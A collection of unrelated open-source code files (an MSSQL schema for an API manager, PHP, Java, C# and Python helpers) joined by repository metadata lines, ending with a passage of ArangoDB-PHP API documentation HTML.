CREATE TABLE AM_GW_API_ARTIFACTS (
API_ID varchar(255) NOT NULL,
REVISION_ID varchar(255) NOT NULL,
ARTIFACT VARBINARY(MAX),
TIME_STAMP DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (REVISION_ID, API_ID),
FOREIGN KEY (API_ID) REFERENCES AM_GW_PUBLISHED_API_DETAILS(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_API_DEPLOYMENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_API_DEPLOYMENTS (
API_ID VARCHAR(255) NOT NULL,
REVISION_ID VARCHAR(255) NOT NULL,
LABEL VARCHAR(255) NOT NULL,
PRIMARY KEY (REVISION_ID, API_ID,LABEL),
FOREIGN KEY (API_ID) REFERENCES AM_GW_PUBLISHED_API_DETAILS(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION
) ;
-- Tenant Themes Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_TENANT_THEMES]') AND TYPE IN (N'U'))
CREATE TABLE AM_TENANT_THEMES (
TENANT_ID INTEGER NOT NULL,
THEME VARBINARY(MAX) NOT NULL,
PRIMARY KEY (TENANT_ID)
);
-- End of API-MGT Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE AM_SCOPE (
SCOPE_ID INTEGER IDENTITY,
NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(512),
TENANT_ID INTEGER NOT NULL DEFAULT -1,
SCOPE_TYPE VARCHAR(255) NOT NULL,
PRIMARY KEY (SCOPE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SCOPE_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SCOPE_BINDING (
SCOPE_ID INTEGER NOT NULL,
SCOPE_BINDING VARCHAR(255) NOT NULL,
BINDING_TYPE VARCHAR(255) NOT NULL,
FOREIGN KEY (SCOPE_ID) REFERENCES AM_SCOPE(SCOPE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_REVISION]') AND TYPE IN (N'U'))
CREATE TABLE AM_REVISION (
ID INTEGER NOT NULL,
API_UUID VARCHAR(256) NOT NULL,
REVISION_UUID VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(255),
CREATED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
CREATED_BY VARCHAR(255),
PRIMARY KEY (ID, API_UUID),
UNIQUE(REVISION_UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_DEPLOYMENT_REVISION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_DEPLOYMENT_REVISION_MAPPING (
NAME VARCHAR(255) NOT NULL,
VHOST VARCHAR(255) NULL,
REVISION_UUID VARCHAR(255) NOT NULL,
DISPLAY_ON_DEVPORTAL BIT DEFAULT 0,
DEPLOYED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (NAME, REVISION_UUID),
FOREIGN KEY (REVISION_UUID) REFERENCES AM_REVISION(REVISION_UUID) ON UPDATE CASCADE ON DELETE CASCADE
);
-- Gateway Environments Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GATEWAY_ENVIRONMENT]') AND TYPE IN (N'U'))
CREATE TABLE AM_GATEWAY_ENVIRONMENT (
ID INTEGER IDENTITY,
UUID VARCHAR(45) NOT NULL,
NAME VARCHAR(255) NOT NULL,
TENANT_DOMAIN VARCHAR(255),
DISPLAY_NAME VARCHAR(255) NULL,
DESCRIPTION VARCHAR(1023) NULL,
UNIQUE (NAME, TENANT_DOMAIN),
UNIQUE (UUID),
PRIMARY KEY (ID)
);
-- Virtual Hosts Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_VHOST]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_VHOST (
GATEWAY_ENV_ID INTEGER,
HOST VARCHAR(255) NOT NULL,
HTTP_CONTEXT VARCHAR(255) NULL,
HTTP_PORT VARCHAR(5) NOT NULL,
HTTPS_PORT VARCHAR(5) NOT NULL,
WS_PORT VARCHAR(5) NOT NULL,
WSS_PORT VARCHAR(5) NOT NULL,
FOREIGN KEY (GATEWAY_ENV_ID) REFERENCES AM_GATEWAY_ENVIRONMENT(ID) ON UPDATE CASCADE ON DELETE CASCADE,
PRIMARY KEY (GATEWAY_ENV_ID, HOST)
);
-- Service Catalog Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SERVICE_CATALOG]') AND TYPE IN (N'U'))
CREATE TABLE AM_SERVICE_CATALOG (
UUID VARCHAR(36) NOT NULL,
SERVICE_KEY VARCHAR(100) NOT NULL,
MD5 VARCHAR(100) NOT NULL,
SERVICE_NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
SERVICE_VERSION VARCHAR(30) NOT NULL,
SERVICE_URL VARCHAR(2048) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DEFINITION_TYPE VARCHAR(20),
DEFINITION_URL VARCHAR(2048),
DESCRIPTION VARCHAR(1024),
SECURITY_TYPE VARCHAR(50),
MUTUAL_SSL_ENABLED BIT DEFAULT 0,
CREATED_TIME DATETIME NULL,
LAST_UPDATED_TIME DATETIME NULL,
CREATED_BY VARCHAR(255),
UPDATED_BY VARCHAR(255),
SERVICE_DEFINITION VARBINARY(MAX) NOT NULL,
METADATA VARBINARY(MAX) NOT NULL,
PRIMARY KEY (UUID),
CONSTRAINT SERVICE_KEY_TENANT UNIQUE(SERVICE_KEY, TENANT_ID),
CONSTRAINT SERVICE_NAME_VERSION_TENANT UNIQUE (SERVICE_NAME, SERVICE_VERSION, TENANT_ID)
);
-- Webhooks --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WEBHOOKS_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_WEBHOOKS_SUBSCRIPTION (
WH_SUBSCRIPTION_ID INTEGER IDENTITY,
API_UUID VARCHAR(255) NOT NULL,
APPLICATION_ID VARCHAR(20) NOT NULL,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
HUB_CALLBACK_URL VARCHAR(1024) NOT NULL,
HUB_TOPIC VARCHAR(255) NOT NULL,
HUB_SECRET VARCHAR(2048),
HUB_LEASE_SECONDS INTEGER,
   UPDATED_AT DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
   EXPIRY_AT BIGINT,
   DELIVERED_AT DATETIME NULL,
DELIVERY_STATE INTEGER,
PRIMARY KEY (WH_SUBSCRIPTION_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WEBHOOKS_UNSUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_WEBHOOKS_UNSUBSCRIPTION (
API_UUID VARCHAR(255) NOT NULL,
APPLICATION_ID VARCHAR(20) NOT NULL,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
HUB_CALLBACK_URL VARCHAR(1024) NOT NULL,
HUB_TOPIC VARCHAR(255) NOT NULL,
HUB_SECRET VARCHAR(2048),
HUB_LEASE_SECONDS INTEGER,
   ADDED_AT DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_SERVICE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_SERVICE_MAPPING (
API_ID INTEGER NOT NULL,
SERVICE_KEY VARCHAR(256) NOT NULL,
MD5 VARCHAR(100) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (API_ID, SERVICE_KEY),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE
);
--Performance indexes start--
create index IDX_ITS_LMT on IDN_THRIFT_SESSION (LAST_MODIFIED_TIME);
create index IDX_IOAT_UT on IDN_OAUTH2_ACCESS_TOKEN (USER_TYPE);
create index IDX_AAI_CTX on AM_API (CONTEXT);
create index IDX_AAKM_CK on AM_APPLICATION_KEY_MAPPING (CONSUMER_KEY);
create index IDX_AAUM_AI on AM_API_URL_MAPPING (API_ID);
create index IDX_AAPM_AI on AM_API_PRODUCT_MAPPING (API_ID);
create index IDX_AAUM_TT on AM_API_URL_MAPPING (THROTTLING_TIER);
create index IDX_AATP_DQT on AM_API_THROTTLE_POLICY (DEFAULT_QUOTA_TYPE);
create index IDX_ACG_QT on AM_CONDITION_GROUP (QUOTA_TYPE);
create index IDX_APS_QT on AM_POLICY_SUBSCRIPTION (QUOTA_TYPE);
create index IDX_AS_AITIAI on AM_SUBSCRIPTION (API_ID,TIER_ID,APPLICATION_ID);
create index IDX_APA_QT on AM_POLICY_APPLICATION (QUOTA_TYPE);
create index IDX_AA_AT_CB on AM_APPLICATION (APPLICATION_TIER,CREATED_BY);
-- Performance indexes end--
| chamindias/carbon-apimgt | features/apimgt/org.wso2.carbon.apimgt.core.feature/src/main/resources/sql/mssql.sql | SQL | apache-2.0 | 95,484 |
<?php
namespace Deliveryboy\V1\Rest\Orderproducts;
class OrderproductsEntity {
public $order_product_id;
public $order_id;
public $order_product_name;
public $order_item_id;
public $order_offer_id;
public $order_type;
public $package_id;
public $unit_price;
public $total_price;
public $quantity;
public function getArrayCopy() {
return array(
'order_product_id' => $this->order_product_id,
'order_id' => $this->order_id,
'order_product_name' => $this->order_product_name,
'order_item_id' => $this->order_item_id,
'order_offer_id' => $this->order_offer_id,
'order_type' => $this->order_type,
'package_id' => $this->package_id,
'unit_price' => $this->unit_price,
'total_price' => $this->total_price,
'quantity' => $this->quantity,
);
}
public function exchangeArray(array $array) {
$this->order_product_id = $array['order_product_id'];
$this->order_id = $array['order_id'];
$this->order_product_name = $array['order_product_name'];
$this->order_item_id = $array['order_item_id'];
$this->order_offer_id = $array['order_offer_id'];
$this->order_type = $array['order_type'];
$this->package_id = $array['package_id'];
$this->unit_price = $array['unit_price'];
$this->total_price = $array['total_price'];
$this->quantity = $array['quantity'];
}
}
| ankuradhey/laundry | api/module/Deliveryboy/src/Deliveryboy/V1/Rest/Orderproducts/OrderproductsEntity.php | PHP | apache-2.0 | 1,519 |
/*
* Copyright (C) 2016 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.googlecode.android_scripting.language;
import com.googlecode.android_scripting.rpc.ParameterDescriptor;
/**
* Represents the BeanShell programming language.
*
* @author [email protected] (Igor Karp)
*/
public class BeanShellLanguage extends Language {
@Override
protected String getImportStatement() {
// FIXME(igor.v.karp): this is interpreter specific
return "source(\"/sdcard/com.googlecode.bshforandroid/extras/bsh/android.bsh\");\n";
}
@Override
protected String getRpcReceiverDeclaration(String rpcReceiver) {
return rpcReceiver + " = Android();\n";
}
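  /**
   * Renders an RPC invocation in BeanShell syntax. For example, with receiver
   * {@code droid}, a call to {@code makeToast} with one string argument is
   * rendered as {@code droid.call("makeToast", "hi")}; with no arguments it is
   * {@code droid.call("makeToast")}.
   */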
@Override
protected String getMethodCallText(String receiver, String method,
ParameterDescriptor[] parameters) {
StringBuilder result =
new StringBuilder().append(getApplyReceiverText(receiver)).append(getApplyOperatorText())
.append(method);
if (parameters.length > 0) {
result.append(getLeftParametersText());
} else {
result.append(getQuote());
}
String separator = "";
for (ParameterDescriptor parameter : parameters) {
result.append(separator).append(getValueText(parameter));
separator = getParameterSeparator();
}
result.append(getRightParametersText());
return result.toString();
}
@Override
protected String getApplyOperatorText() {
return ".call(\"";
}
@Override
protected String getLeftParametersText() {
return "\", ";
}
@Override
protected String getRightParametersText() {
return ")";
}
}
| kuri65536/sl4a | android/Common/src/com/googlecode/android_scripting/language/BeanShellLanguage.java | Java | apache-2.0 | 2,132 |
/*
* Copyright [2017]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netpet.spools.book.insidethejavavirtualmachine.chapter18;
/**
 * @Desc Use javap -verbose / javap -c Hello.class to inspect the compiled bytecode file.
* Created by woncz on 2017/8/18.
*/
public class Hello {
}
| WindsorWang/Spools | spools-book/src/main/java/com/netpet/spools/book/insidethejavavirtualmachine/chapter18/Hello.java | Java | apache-2.0 | 789 |
<?php
/*******************************************************************************
* Copyright 2009-2014 Amazon Services. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
*
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at: http://aws.amazon.com/apache2.0
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*******************************************************************************
* PHP Version 5
* @category Amazon
* @package Marketplace Web Service Sellers
* @version 2011-07-01
* Library Version: 2014-10-20
* Generated: Fri Oct 17 18:34:06 GMT 2014
*/
class MarketplaceWebServiceSellers_Mock implements MarketplaceWebServiceSellers_Interface
{
// Public API ------------------------------------------------------------//
/**
* Get Service Status
* Returns the service status of a particular MWS API section. The operation
* takes no input.
* All API sections within the API are required to implement this operation.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_GetServiceStatus request or MarketplaceWebServiceSellers_Model_GetServiceStatus object itself
* @see MarketplaceWebServiceSellers_Model_GetServiceStatus
* @return MarketplaceWebServiceSellers_Model_GetServiceStatusResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function getServiceStatus($request)
{
return MarketplaceWebServiceSellers_Model_GetServiceStatusResponse::fromXML($this->_invoke('GetServiceStatus'));
}
/**
* List Marketplace Participations
* Returns a list of marketplaces that the seller submitting the request can sell in,
* and a list of participations that include seller-specific information in that marketplace.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations request or MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations object itself
* @see MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations
* @return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function listMarketplaceParticipations($request)
{
return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsResponse::fromXML($this->_invoke('ListMarketplaceParticipations'));
}
/**
* List Marketplace Participations By Next Token
* Returns the next page of marketplaces and participations using the NextToken value
* that was returned by your previous request to either ListMarketplaceParticipations or
* ListMarketplaceParticipationsByNextToken.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken request or MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken object itself
* @see MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken
* @return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextTokenResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function listMarketplaceParticipationsByNextToken($request)
{
return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextTokenResponse::fromXML($this->_invoke('ListMarketplaceParticipationsByNextToken'));
}
// Private API ------------------------------------------------------------//
private function _invoke($actionName)
{
        return file_get_contents(dirname(__FILE__) . '/Mock/' . $actionName . 'Response.xml',
/** search include path */
true);
}
}
| brickfox/mws | src/MarketplaceWebServiceSellers/Mock.php | PHP | apache-2.0 | 4,108 |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Trifolia.DB
{
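    /// <summary>
    /// Conformance verbs (SHALL/SHOULD/MAY and their negations) used when
    /// expressing template constraints; UNKNOWN is a sentinel for unmapped values.
    /// </summary>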
public enum Conformance
{
SHALL = 1,
SHALL_NOT = 2,
SHOULD = 3,
SHOULD_NOT = 4,
MAY = 5,
MAY_NOT = 6,
UNKNOWN = 999
}
}
| lantanagroup/trifolia | Trifolia.DB/Conformance.cs | C# | apache-2.0 | 302 |
package com.ctrip.xpipe.redis.checker.alert.manager;
import com.ctrip.xpipe.redis.checker.alert.ALERT_TYPE;
import com.ctrip.xpipe.redis.checker.alert.AlertChannel;
import com.ctrip.xpipe.redis.checker.alert.AlertConfig;
import com.ctrip.xpipe.redis.checker.alert.AlertEntity;
import com.ctrip.xpipe.redis.checker.alert.message.AlertEntityHolderManager;
import com.ctrip.xpipe.redis.checker.alert.policy.channel.ChannelSelector;
import com.ctrip.xpipe.redis.checker.alert.policy.channel.DefaultChannelSelector;
import com.ctrip.xpipe.redis.checker.alert.policy.receiver.*;
import com.ctrip.xpipe.redis.checker.alert.policy.timing.RecoveryTimeSlotControl;
import com.ctrip.xpipe.redis.checker.alert.policy.timing.TimeSlotControl;
import com.ctrip.xpipe.redis.checker.config.CheckerDbConfig;
import com.ctrip.xpipe.redis.core.meta.MetaCache;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import javax.annotation.PostConstruct;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.TimeUnit;
import java.util.function.LongSupplier;
/**
* @author chen.zhu
* <p>
* Oct 18, 2017
*/
@Component
public class AlertPolicyManager {
@Autowired
private AlertConfig alertConfig;
@Autowired
private CheckerDbConfig checkerDbConfig;
@Autowired
private MetaCache metaCache;
private EmailReceiver emailReceiver;
private GroupEmailReceiver groupEmailReceiver;
private ChannelSelector channelSelector;
private TimeSlotControl recoveryTimeController;
@PostConstruct
public void initPolicies() {
emailReceiver = new DefaultEmailReceiver(alertConfig, checkerDbConfig, metaCache);
groupEmailReceiver = new DefaultGroupEmailReceiver(alertConfig, checkerDbConfig, metaCache);
channelSelector = new DefaultChannelSelector();
if(recoveryTimeController == null) {
recoveryTimeController = new RecoveryTimeSlotControl(alertConfig);
}
}
public List<AlertChannel> queryChannels(AlertEntity alert) {
return channelSelector.alertChannels(alert);
}
public long queryRecoverMilli(AlertEntity alert) {
return recoveryTimeController.durationMilli(alert);
}
public long querySuspendMilli(AlertEntity alert) {
return TimeUnit.MINUTES.toMillis(alertConfig.getAlertSystemSuspendMinute());
}
public EmailReceiverModel queryEmailReceivers(AlertEntity alert) {
return emailReceiver.receivers(alert);
}
public void markCheckInterval(ALERT_TYPE alertType, LongSupplier checkInterval) {
if(recoveryTimeController == null) {
recoveryTimeController = new RecoveryTimeSlotControl(alertConfig);
}
recoveryTimeController.mark(alertType, checkInterval);
}
public Map<EmailReceiverModel, Map<ALERT_TYPE, Set<AlertEntity>>> queryGroupedEmailReceivers(
AlertEntityHolderManager alerts) {
return groupEmailReceiver.getGroupedEmailReceiver(alerts);
}
}
| ctripcorp/x-pipe | redis/redis-checker/src/main/java/com/ctrip/xpipe/redis/checker/alert/manager/AlertPolicyManager.java | Java | apache-2.0 | 3,064 |
package com.coolweather.android.util;
import okhttp3.OkHttpClient;
import okhttp3.Request;
/**
* Created by fengj on 2017/1/27.
*/
public class HttpUtil {
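    /**
     * Sends an asynchronous GET request to {@code address}; OkHttp invokes the
     * supplied {@code callback} on a background thread (not the UI thread).
     *
     * Usage sketch (the URL is illustrative):
     * <pre>{@code
     * HttpUtil.sendOkHttpRequest("http://www.example.com", new Callback() {
     *     public void onFailure(Call call, IOException e) { } // handle error
     *     public void onResponse(Call call, Response response) throws IOException {
     *         String body = response.body().string(); // runs off the main thread
     *     }
     * });
     * }</pre>
     */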
public static void sendOkHttpRequest(String address,okhttp3.Callback callback){
        OkHttpClient client = new OkHttpClient();
        Request request = new Request.Builder().url(address).build();
client.newCall(request).enqueue(callback);
}
}
| cabbagemaoyi/coolweather | app/src/main/java/com/coolweather/android/util/HttpUtil.java | Java | apache-2.0 | 419 |
# Copyright 2018 Flight Lab authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for network related helpers."""
import socket
def get_ip():
"""Get primary IP (the one with a default route) of local machine.
This works on both Linux and Windows platforms, and doesn't require working
internet connection.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
return s.getsockname()[0]
  except Exception:
return '127.0.0.1'
finally:
s.close()
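

if __name__ == '__main__':
  # Manual check (illustrative only, not part of the library API): print the
  # primary IP address this machine reports via the default-route heuristic.
  print(get_ip())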
| google/flight-lab | controller/common/net.py | Python | apache-2.0 | 1,062 |
/*
* Copyright 2013
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package org.openntf.domino.iterators;
import java.util.Iterator;
import org.openntf.domino.Base;
import org.openntf.domino.Database;
import org.openntf.domino.DocumentCollection;
import org.openntf.domino.Session;
import org.openntf.domino.View;
import org.openntf.domino.ViewEntryCollection;
import org.openntf.domino.utils.DominoUtils;
import org.openntf.domino.utils.Factory;
// TODO: Auto-generated Javadoc
/**
* The Class AbstractDominoIterator.
*
* @param <T>
* the generic type
*/
public abstract class AbstractDominoIterator<T> implements Iterator<T> {
/** The server name_. */
private String serverName_;
/** The file path_. */
private String filePath_;
/** The collection_. */
private Base<?> collection_;
/** The session_. */
private transient Session session_;
/** The database_. */
private transient Database database_;
/**
* Instantiates a new abstract domino iterator.
*
* @param collection
* the collection
*/
protected AbstractDominoIterator(final Base<?> collection) {
setCollection(collection);
}
/**
* Gets the session.
*
* @return the session
*/
protected Session getSession() {
if (session_ == null) {
try {
session_ = Factory.getSession();
} catch (Throwable e) {
DominoUtils.handleException(e);
return null;
}
}
return session_;
}
/**
* Gets the database.
*
* @return the database
*/
protected Database getDatabase() {
if (database_ == null) {
Session session = getSession();
try {
database_ = session.getDatabase(getServerName(), getFilePath());
} catch (Throwable e) {
DominoUtils.handleException(e);
return null;
}
}
return database_;
}
/**
* Gets the file path.
*
* @return the file path
*/
protected String getFilePath() {
return filePath_;
}
/**
* Gets the server name.
*
* @return the server name
*/
protected String getServerName() {
return serverName_;
}
/**
* Sets the database.
*
* @param database
* the new database
*/
protected void setDatabase(final Database database) {
if (database != null) {
try {
setFilePath(database.getFilePath());
setServerName(database.getServer());
} catch (Throwable e) {
DominoUtils.handleException(e);
}
}
}
/**
* Sets the file path.
*
* @param filePath
* the new file path
*/
protected void setFilePath(final String filePath) {
filePath_ = filePath;
}
/**
* Sets the server name.
*
* @param serverName
* the new server name
*/
protected void setServerName(final String serverName) {
serverName_ = serverName;
}
/**
* Gets the collection.
*
* @return the collection
*/
public Base<?> getCollection() {
return collection_;
}
/**
* Sets the collection.
*
* @param collection
* the new collection
*/
public void setCollection(final Base<?> collection) {
if (collection != null) {
if (collection instanceof DocumentCollection) {
org.openntf.domino.Database parent = ((org.openntf.domino.DocumentCollection) collection).getParent();
				// FIXME NTF - this is suboptimal, but we still need to sort out the parent/child pattern
				session_ = Factory.fromLotus(parent.getParent(), Session.SCHEMA, null);
				database_ = Factory.fromLotus(parent, Database.SCHEMA, session_);
} else if (collection instanceof ViewEntryCollection) {
View vw = ((ViewEntryCollection) collection).getParent();
database_ = vw.getParent();
session_ = Factory.getSession(database_);
}
if (database_ != null) {
setDatabase(database_);
}
}
collection_ = collection;
}
}
| mariusj/org.openntf.domino | domino/core/archive/AbstractDominoIterator.java | Java | apache-2.0 | 4,458 |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Class triagens\ArangoDb\Vertex | ArangoDB-PHP API Documentation</title>
<link rel="stylesheet" href="resources/bootstrap.min.css?973e37a8502921d56bc02bb55321f45b072b6f71">
<link rel="stylesheet" href="resources/style.css?49f43d3208c5d7e33fa16d36107a345bf11cc00d">
</head>
<body>
<nav id="navigation" class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<a href="index.html" class="navbar-brand">ArangoDB-PHP API Documentation</a>
</div>
<div class="collapse navbar-collapse">
<form id="search" class="navbar-form navbar-left" role="search">
<input type="hidden" name="cx" value="">
<input type="hidden" name="ie" value="UTF-8">
<div class="form-group">
<input type="text" name="q" class="search-query form-control" placeholder="Search">
</div>
</form>
<ul class="nav navbar-nav">
<li>
<a href="namespace-triagens.ArangoDb.html" title="Summary of triagens\ArangoDb"><span>Namespace</span></a>
</li>
<li class="active">
<span>Class</span> </li>
<li class="divider-vertical"></li>
<li>
<a href="annotation-group-deprecated.html" title="List of elements with deprecated annotation">
<span>Deprecated</span>
</a>
</li>
</ul>
</div>
</div>
</nav>
<div id="left">
<div id="menu">
<div id="groups">
<h3>Namespaces</h3>
<ul>
<li class="active">
<a href="namespace-triagens.html">
triagens<span></span>
</a>
<ul>
<li class="active">
<a href="namespace-triagens.ArangoDb.html">
ArangoDb </a>
</li>
</ul></li>
</ul>
</div>
<div id="elements">
<h3>Classes</h3>
<ul>
<li><a href="class-triagens.ArangoDb.AdminHandler.html">AdminHandler</a></li>
<li><a href="class-triagens.ArangoDb.AqlUserFunction.html">AqlUserFunction</a></li>
<li><a href="class-triagens.ArangoDb.Autoloader.html">Autoloader</a></li>
<li><a href="class-triagens.ArangoDb.Batch.html">Batch</a></li>
<li><a href="class-triagens.ArangoDb.BatchPart.html">BatchPart</a></li>
<li><a href="class-triagens.ArangoDb.BindVars.html">BindVars</a></li>
<li><a href="class-triagens.ArangoDb.Collection.html">Collection</a></li>
<li><a href="class-triagens.ArangoDb.CollectionHandler.html">CollectionHandler</a></li>
<li><a href="class-triagens.ArangoDb.Connection.html">Connection</a></li>
<li><a href="class-triagens.ArangoDb.ConnectionOptions.html">ConnectionOptions</a></li>
<li><a href="class-triagens.ArangoDb.Cursor.html">Cursor</a></li>
<li><a href="class-triagens.ArangoDb.Database.html">Database</a></li>
<li><a href="class-triagens.ArangoDb.DefaultValues.html">DefaultValues</a></li>
<li><a href="class-triagens.ArangoDb.Document.html">Document</a></li>
<li><a href="class-triagens.ArangoDb.DocumentHandler.html">DocumentHandler</a></li>
<li><a href="class-triagens.ArangoDb.Edge.html">Edge</a></li>
<li><a href="class-triagens.ArangoDb.EdgeDefinition.html">EdgeDefinition</a></li>
<li><a href="class-triagens.ArangoDb.EdgeHandler.html">EdgeHandler</a></li>
<li><a href="class-triagens.ArangoDb.Endpoint.html">Endpoint</a></li>
<li><a href="class-triagens.ArangoDb.Export.html">Export</a></li>
<li><a href="class-triagens.ArangoDb.ExportCursor.html">ExportCursor</a></li>
<li><a href="class-triagens.ArangoDb.Graph.html">Graph</a></li>
<li><a href="class-triagens.ArangoDb.GraphHandler.html">GraphHandler</a></li>
<li><a href="class-triagens.ArangoDb.Handler.html">Handler</a></li>
<li><a href="class-triagens.ArangoDb.HttpHelper.html">HttpHelper</a></li>
<li><a href="class-triagens.ArangoDb.HttpResponse.html">HttpResponse</a></li>
<li><a href="class-triagens.ArangoDb.QueryCacheHandler.html">QueryCacheHandler</a></li>
<li><a href="class-triagens.ArangoDb.QueryHandler.html">QueryHandler</a></li>
<li><a href="class-triagens.ArangoDb.Statement.html">Statement</a></li>
<li><a href="class-triagens.ArangoDb.TraceRequest.html">TraceRequest</a></li>
<li><a href="class-triagens.ArangoDb.TraceResponse.html">TraceResponse</a></li>
<li><a href="class-triagens.ArangoDb.Transaction.html">Transaction</a></li>
<li><a href="class-triagens.ArangoDb.Traversal.html">Traversal</a></li>
<li><a href="class-triagens.ArangoDb.UpdatePolicy.html">UpdatePolicy</a></li>
<li><a href="class-triagens.ArangoDb.UrlHelper.html">UrlHelper</a></li>
<li><a href="class-triagens.ArangoDb.Urls.html">Urls</a></li>
<li><a href="class-triagens.ArangoDb.User.html">User</a></li>
<li><a href="class-triagens.ArangoDb.UserHandler.html">UserHandler</a></li>
<li><a href="class-triagens.ArangoDb.ValueValidator.html">ValueValidator</a></li>
<li class="active"><a href="class-triagens.ArangoDb.Vertex.html">Vertex</a></li>
<li><a href="class-triagens.ArangoDb.VertexHandler.html">VertexHandler</a></li>
</ul>
<h3>Exceptions</h3>
<ul>
<li><a href="class-triagens.ArangoDb.ClientException.html">ClientException</a></li>
